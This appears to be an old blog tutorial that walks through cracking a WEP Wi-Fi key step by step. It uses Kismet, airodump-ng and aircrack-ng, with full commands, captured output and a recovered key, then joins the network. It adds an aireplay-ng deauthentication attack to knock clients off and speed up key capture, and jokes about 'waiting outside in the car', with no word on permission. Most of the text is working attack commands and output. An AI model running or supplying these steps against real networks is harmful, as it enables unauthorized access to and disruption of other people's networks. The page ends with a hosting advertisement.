|
|
Here is a live example for cracking a wep password using Kismet and aircrack-ng.
My wifi card is(lspci output):
03:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN [Kedron] Network Connection (rev 61)
I use iwl4965 module.
After installing kismet you need to go to /etc/kismet.conf and add the following line:
source=ipw3945,wlan0,Intel
Next you need to discover the networks. Kismet should do the job.
Putting interface in monitor mode:
#ifconfig wlan0 down
#iwconfig wlan0 mode monitor
#kismet
After that we analize the kismet logs:
# cat Kismet-Feb-19-2009-1.network
Network 1: "dlink" BSSID: "00:22:B0:XX:XX:XX"
Type : infrastructure
Carrier : 802.11b
Info : "None"
Channel : 01
Encryption : "WEP "
Maxrate : 0.0
LLC : 1859
Data : 853
Crypt : 853
Weak : 0
Dupe IV : 677
Total : 2712
First : "Thu Feb 19 20:08:25 2009"
Last : "Thu Feb 19 20:27:28 2009"
Min Loc: Lat 90.000000 Lon 180.000000 Alt 0.000000 Spd 0.000000
Max Loc: Lat -90.000000 Lon -180.000000 Alt 0.000000 Spd 0.000000
So we see that this netwok use WEP Encryption and runs on channel 01. Good.
Next we need to sniff all traffic of the dlink wich runs on channel 1:
#airodump-ng --channel 01 --bssid 00:22:B0:XX:XX:XX --write dlink wlan0
CH 1 ][ Elapsed: 2 hours 48 mins ][ 2009-02-21 22:26
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:B0:XX:XX:XX 209 100 98884 15311 0 1 54. WEP WEP dlink
BSSID STATION PWR Rate Lost Packets Probes
00:22:B0:XX:XX:XX 00:21:63:XX:XX:XX 187 54-54 0 33135
^C
#
Experience shows that you will need to capture around 50,000 to 200,000 IVs in order to crack a 64 bit WEP key and for a 128 bit key, you will need around 200,000 to 700,000 IVs!
Next we start to crack the dump file:
# cp dlink-01.cap x.cap ; aircrack-ng x.cap
Opening x.cap
Read 172790 packets.
# BSSID ESSID Encryption
1 00:22:B0:XX:XX:XX dlink WEP (15176 IVs)
Choosing first network as target.
Opening x.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 15176 ivs.
Aircrack-ng 1.0 beta1
[00:00:20] Tested 117 keys (got 15176 IVs)
KB depth byte(vote)
0 1/ 2 AB(22016) 9C(20480) F7(20224) 58(19712) 87(19712) BA(19456) FB(19200)
1 2/ 3 CD(20736) 1B(20224) D8(20224) 4C(19968) B4(19712) EB(19712) 11(18944)
2 0/ 5 EF(20736) 3E(20480) 6F(20480) 10(20224) 2F(20224) EF(19712) 16(19456)
3 1/ 4 43(20736) 67(20480) 80(20480) 2C(19456) 5A(19456) 22(19200) B7(18944)
4 0/ 1 77(25088) C1(22528) 72(20736) 07(20480) BB(20480) 08(19200) 3F(19200)
KEY FOUND! [ AB:CD:EF:11:22 ]
Decrypted correctly: 100%
Now to put the wifi in managed mode:
ifconfig wlan0 down
iwconfig wlan0 mode managed essid dlink ap 00:22:B0:XX:XX:XX enc "ABCDEF1122"
dhclient wlan0
WEP Attacks
Deauthentication Attack
This is a simple and very effective attack. We just force the connected client to disconnect then we capture the re-connect and authentication, saves time so we don't have to wait for the client to do it themselves (a tad less "waiting outside in the car" creepiness as well). With airodump running in another console, your attack will look something like this:
aireplay-ng -0 5 -a <AP MAC> -c <Client MAC> wlan0
In our example:
aireplay-ng -0 5 -a 00:22:B0:XX:XX:XX -c 00:21:63:XX:XX:XX wlan0
After a few seconds the re-authentication should be complete and we can attempt to Dictionary Brute Force the PMK.
Note:
We use Hosting and VPS Hosting, from: www.star-host.org
We like and trust them.
Good prices, high security.